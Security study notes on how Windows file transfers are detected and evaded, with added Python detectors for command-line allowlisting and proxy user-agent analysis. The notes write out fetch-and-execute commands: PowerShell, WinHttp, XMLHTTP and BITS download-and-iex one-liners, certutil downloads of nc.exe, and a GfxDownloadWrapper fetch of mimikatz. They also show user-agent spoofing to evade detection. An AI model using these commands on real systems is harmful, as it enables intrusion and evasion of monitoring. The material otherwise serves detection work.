File Transfer Detection & Evasion Techniques

Detection Methods

1. Command Line Detection

  • Methodology: Implement whitelisting over blacklisting

  • Key Point: Whitelisting is more time-consuming but provides better security

  • Best Practice: Focus on detecting unusual command-line patterns
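An added example (not from the original notes) of what "whitelisting over blacklisting" means in practice for command-line telemetry. It runs both approaches over a few constructed process-creation events built from the download commands listed under "Common Transfer Methods" and the LOLBAS section of these notes: the blacklist knows only the primitives written down here, while the allowlist treats any process that puts a URL on its command line as suspect unless both the image and the destination host are approved. The image paths, the AV updater binary and the hosts are constructed for the example and are not from the page.

```python
import re
from urllib.parse import urlparse

URL_RE = re.compile(r'''https?://[^\s"']+''', re.IGNORECASE)

# Blacklist: the download primitives catalogued on this page. It catches
# exactly what has been written down and nothing else.
BLACKLIST = {
    "certutil-download": re.compile(r"certutil(\.exe)?\b.*\s-(urlcache|verifyctl)\b", re.I),
    "powershell-webrequest": re.compile(r"\b(Invoke-WebRequest|Invoke-RestMethod|iwr|irm)\b", re.I),
    "com-http-object": re.compile(r"WinHttp\.WinHttpRequest|Msxml2\.XMLHTTP", re.I),
    "bits-transfer": re.compile(r"\bStart-BitsTransfer\b", re.I),
}

# Allowlist: images expected to carry a URL on their command line, and the
# hosts they may fetch from (constructed for the example). Any other image
# that puts a URL on its command line is reported, known or not.
ALLOWLIST = {
    r"c:\program files\av\updater.exe": {"updates.av.example"},
}

# Constructed process-creation events (the fields a Sysmon EID 1 / 4688
# record gives you); the command lines are the ones shown on this page,
# the image paths are placeholders.
SAMPLE_EVENTS = [
    {"image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r'powershell.exe Invoke-WebRequest http://10.10.10.32/nc.exe -OutFile "C:\Users\Public\nc.exe"'},
    {"image": r"C:\Windows\System32\certutil.exe",
     "cmdline": "certutil -urlcache -split -f http://10.10.10.32/nc.exe"},
    {"image": r"C:\Windows\System32\svchost.exe",
     "cmdline": "svchost.exe -k netsvcs -p -s wuauserv"},
    {"image": r"C:\Program Files\AV\updater.exe",
     "cmdline": "updater.exe --fetch https://updates.av.example/defs.bin"},
    {"image": r"C:\Windows\System32\DriverStore\FileRepository\<intel-driver-dir>\GfxDownloadWrapper.exe",
     "cmdline": r'GfxDownloadWrapper.exe "http://10.10.10.132/mimikatz.exe" "C:\Temp\nc.exe"'},
]


def extract_urls(cmdline):
    """All http(s) URLs present on a command line."""
    return URL_RE.findall(cmdline)


def blacklist_hits(cmdline):
    """Names of the catalogued download primitives found on the command line."""
    return [name for name, rx in BLACKLIST.items() if rx.search(cmdline)]


def allowlist_violation(image, cmdline):
    """Reason string if the event falls outside the allowlist, else None."""
    urls = extract_urls(cmdline)
    if not urls:
        return None  # no URL on the command line: out of scope for this rule
    allowed_hosts = ALLOWLIST.get(image.lower())
    if allowed_hosts is None:
        return f"{image} is not an approved downloader"
    for url in urls:
        host = urlparse(url).hostname
        if host not in allowed_hosts:
            return f"{image} fetched from unapproved host {host}"
    return None


def triage(events):
    """Run both rule sets; an event is reported if either one fires."""
    findings = []
    for ev in events:
        bl = blacklist_hits(ev["cmdline"])
        al = allowlist_violation(ev["image"], ev["cmdline"])
        if bl or al:
            findings.append({"cmdline": ev["cmdline"], "blacklist": bl, "allowlist": al})
    return findings


if __name__ == "__main__":
    for f in triage(SAMPLE_EVENTS):
        print(f"blacklist={f['blacklist'] or '-'} allowlist={f['allowlist'] or '-'} :: {f['cmdline']}")
```

The GfxDownloadWrapper.exe event is the point of the comparison: no blacklist pattern fires on it because nothing on the page names it, yet the allowlist reports it just like the PowerShell and certutil events, because an unapproved image put a URL on its command line. The cost is the one the notes mention: the allowlist has to be built from a baseline of which images legitimately download from where.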

2. HTTP Protocol Analysis

  • Focus Area: User Agent String Detection

  • Implementation Steps:

    1. Create whitelist of legitimate user agents

    2. Include common system processes

    3. Document legitimate services (Windows Update, AV)

    4. Configure SIEM for user agent monitoring

Common Transfer Methods & Detection Signatures

1. PowerShell Invoke-WebRequest

# Download Command
Invoke-WebRequest http://10.10.10.32/nc.exe -OutFile "C:\Users\Public\nc.exe"
Invoke-RestMethod http://10.10.10.32/nc.exe -OutFile "C:\Users\Public\nc.exe"

# Detection Signature
User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.14393.0

2. WinHttpRequest

# Download Command
$h=new-object -com WinHttp.WinHttpRequest.5.1
$h.open('GET','http://10.10.10.32/nc.exe',$false)
$h.send()
iex $h.ResponseText

# Detection Signature
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

3. Msxml2.XMLHTTP

# Download Command
$h=New-Object -ComObject Msxml2.XMLHTTP
$h.open('GET','http://10.10.10.32/nc.exe',$false)
$h.send()
iex $h.responseText

# Detection Signature
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E)

4. Certutil

# Download Commands
certutil -urlcache -split -f http://10.10.10.32/nc.exe
certutil -verifyctl -split -f http://10.10.10.32/nc.exe

# Detection Signature
User-Agent: Microsoft-CryptoAPI/10.0

5. BITS Transfer

# Download Command
Import-Module bitstransfer
Start-BitsTransfer 'http://10.10.10.32/nc.exe' $env:temp\t
$r=gc $env:temp\t
rm $env:temp\t
iex $r

# Detection Signature
User-Agent: Microsoft BITS/7.8

Evasion Techniques

1. User Agent Manipulation

Listing Available User Agents

[Microsoft.PowerShell.Commands.PSUserAgent].GetProperties() | Select-Object Name,@{label="User Agent";Expression={[Microsoft.PowerShell.Commands.PSUserAgent]::$($_.Name)}} | fl

Common User Agent Strings

  • Internet Explorer:
    Mozilla/5.0 (compatible; MSIE 9.0; Windows NT; Windows NT 10.0; en-US)

  • Firefox:
    Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) Gecko/20100401 Firefox/4.0

  • Chrome:
    Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) AppleWebKit/534.6 (KHTML, like Gecko) Chrome/7.0.500.0 Safari/534.6

  • Opera:
    Opera/9.70 (Windows NT; Windows NT 10.0; en-US) Presto/2.2.1

  • Safari:
    Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) AppleWebKit/533.16 (KHTML, like Gecko) Version/5.0 Safari/533.16

Custom User Agent Implementation

# Set Chrome User Agent
$UserAgent = [Microsoft.PowerShell.Commands.PSUserAgent]::Chrome
Invoke-WebRequest http://10.10.10.32/nc.exe -UserAgent $UserAgent -OutFile "C:\Users\Public\nc.exe"
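As an added example (not part of the original notes), the following Python pulls the "HTTP Protocol Analysis" steps, the detection signatures from "Common Transfer Methods" and the PSUserAgent strings from this evasion section into one check over constructed proxy log lines, standing in for the SIEM rule the methodology asks for. A rule written from these notes needs three parts: an allowlist of agents the environment is known to run, the tool signatures tied to the destinations they are expected to reach (Microsoft-CryptoAPI/10.0 is also Windows' own CRL/OCSP fetcher and BITS carries Windows Update, so those agents are only suspicious once they leave their usual hosts), and exact matches on the static PSUserAgent strings, which a genuine current browser never sends. The log format, the hosts, the allowlisted Chrome and Delivery Optimization patterns and the AV updater agent are constructed for the example.

```python
import re
from urllib.parse import urlparse

# Tool signatures listed on this page, keyed by the transfer method they reveal.
TOOL_SIGNATURES = {
    "powershell-invoke-webrequest": re.compile(r"WindowsPowerShell/\d"),
    "winhttprequest-com": re.compile(r"WinHttp\.WinHttpRequest\.\d"),
    "msxml2-xmlhttp": re.compile(r"MSIE 7\.0; Windows NT 10\.0; Win64; x64; Trident/7\.0"),
    "certutil-cryptoapi": re.compile(r"^Microsoft-CryptoAPI/"),
    "bits": re.compile(r"^Microsoft BITS/"),
}

# Hosts a tool-style agent legitimately talks to (constructed). CryptoAPI
# fetches CRLs/OCSP for Windows itself and BITS moves Windows Update
# payloads, so the agent alone is not a finding; the destination is.
TOOL_ALLOWED_HOSTS = {
    "certutil-cryptoapi": {"crl.example-ca.test", "ocsp.example-ca.test"},
    "bits": {"update.example-corp.test"},
}

# The static strings exposed by [Microsoft.PowerShell.Commands.PSUserAgent]
# (listed above). They never change, so an exact match is a strong signal.
PSUSERAGENT_STRINGS = {
    "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT; Windows NT 10.0; en-US)": "InternetExplorer",
    "Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) Gecko/20100401 Firefox/4.0": "FireFox",
    "Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) AppleWebKit/534.6 (KHTML, like Gecko) Chrome/7.0.500.0 Safari/534.6": "Chrome",
    "Opera/9.70 (Windows NT; Windows NT 10.0; en-US) Presto/2.2.1": "Opera",
    "Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) AppleWebKit/533.16 (KHTML, like Gecko) Version/5.0 Safari/533.16": "Safari",
}

# Allowlist (steps 1-3 of the methodology): agents this environment is known
# to run. Constructed; a real list comes from the organisation's proxy baseline.
UA_ALLOWLIST = [
    re.compile(r"^Mozilla/5\.0 \(Windows NT 10\.0; Win64; x64\) AppleWebKit/537\.36 .*Chrome/1\d\d\."),
    re.compile(r"^Microsoft-Delivery-Optimization/"),
    re.compile(r"^ExampleAV-Updater/\d"),
]

# Constructed tab-separated proxy log: time, client, method, url, status, user agent.
SAMPLE_PROXY_LOG = """\
2024-05-01T10:00:01Z\t10.10.14.5\tGET\thttp://10.10.10.32/nc.exe\t200\tMozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.14393.0
2024-05-01T10:00:02Z\t10.10.14.5\tGET\thttp://crl.example-ca.test/root.crl\t200\tMicrosoft-CryptoAPI/10.0
2024-05-01T10:00:03Z\t10.10.14.5\tGET\thttp://10.10.10.32/nc.exe\t200\tMicrosoft-CryptoAPI/10.0
2024-05-01T10:00:04Z\t10.10.14.6\tGET\thttps://update.example-corp.test/kb.cab\t200\tMicrosoft BITS/7.8
2024-05-01T10:00:05Z\t10.10.14.6\tGET\thttp://10.10.10.32/nc.exe\t200\tMozilla/5.0 (Windows NT; Windows NT 10.0; en-US) AppleWebKit/534.6 (KHTML, like Gecko) Chrome/7.0.500.0 Safari/534.6
2024-05-01T10:00:06Z\t10.10.14.7\tGET\thttps://www.example.test/\t200\tMozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
2024-05-01T10:00:07Z\t10.10.14.7\tGET\thttp://10.10.10.32/nc.exe\t200\tMozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
2024-05-01T10:00:08Z\t10.10.14.8\tGET\thttps://defs.av.example.test/daily.bin\t200\tExampleAV-Updater/3.2
"""


def parse_line(line):
    """Split one constructed log line into its fields plus the destination host."""
    ts, client, method, url, status, ua = line.split("\t", 5)
    return {"ts": ts, "client": client, "method": method, "url": url,
            "host": urlparse(url).hostname, "status": int(status), "ua": ua}


def classify_user_agent(ua, host):
    """Return (verdict, detail); only 'allowed' is silent."""
    if ua in PSUSERAGENT_STRINGS:
        return ("spoofed-browser", f"static PSUserAgent::{PSUSERAGENT_STRINGS[ua]} string")
    for tool, rx in TOOL_SIGNATURES.items():
        if rx.search(ua):
            if host in TOOL_ALLOWED_HOSTS.get(tool, set()):
                return ("allowed", f"{tool} to approved host {host}")
            return ("known-tool", tool)
    for rx in UA_ALLOWLIST:
        if rx.search(ua):
            return ("allowed", "matches allowlist")
    return ("unknown-agent", ua)  # allowlist model: unseen agents are findings too


def scan(log_text):
    """Return (client, url, verdict, detail) for every non-allowed request."""
    alerts = []
    for line in log_text.splitlines():
        if line.strip():
            rec = parse_line(line)
            verdict, detail = classify_user_agent(rec["ua"], rec["host"])
            if verdict != "allowed":
                alerts.append((rec["client"], rec["url"], verdict, detail))
    return alerts


if __name__ == "__main__":
    for client, url, verdict, detail in scan(SAMPLE_PROXY_LOG):
        print(f"{client} {verdict:16} {detail} -> {url}")
```

Two lines in the sample carry the same Microsoft-CryptoAPI/10.0 agent; only the one fetching an executable from 10.10.10.32 is reported, which is why the rule keys tool signatures to destination hosts rather than alerting on the agent alone. The spoofed Chrome request is caught by the exact-string check even though "Chrome" appears in it, and any agent outside the allowlist is still surfaced as unknown, so the rule stays useful when the next tool picks an agent that is not on this page.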

2. LOLBAS (Living Off The Land Binaries and Scripts)

  • Purpose: Bypass application whitelisting

  • Example Using GfxDownloadWrapper.exe:

GfxDownloadWrapper.exe "http://10.10.10.132/mimikatz.exe" "C:\Temp\nc.exe"

Detection & Defense Methodology Checklist

Immediate Actions

Regular Monitoring

Investigation Steps

  1. Identify suspicious user agents

  2. Analyze transfer patterns

  3. Cross-reference with whitelist

  4. Document new threat patterns

Additional Resources